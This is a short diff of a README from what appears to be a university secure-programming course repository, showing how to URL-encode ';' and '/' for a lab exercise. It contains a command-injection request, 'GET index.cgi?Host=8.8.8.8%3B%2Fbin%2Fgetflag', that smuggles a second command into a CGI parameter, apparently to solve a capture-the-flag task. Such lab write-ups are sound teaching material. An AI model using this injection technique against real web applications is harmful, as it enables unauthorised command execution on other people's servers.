marianoktm/SECPROG-Unisa/README.md

 - ; -> 3B
 - / -> 2F

-So the string should be something similar:
+So the string should look like this:

 `GET index.cgi?Host=8.8.8.8%3B%2Fbin%2Fgetflag`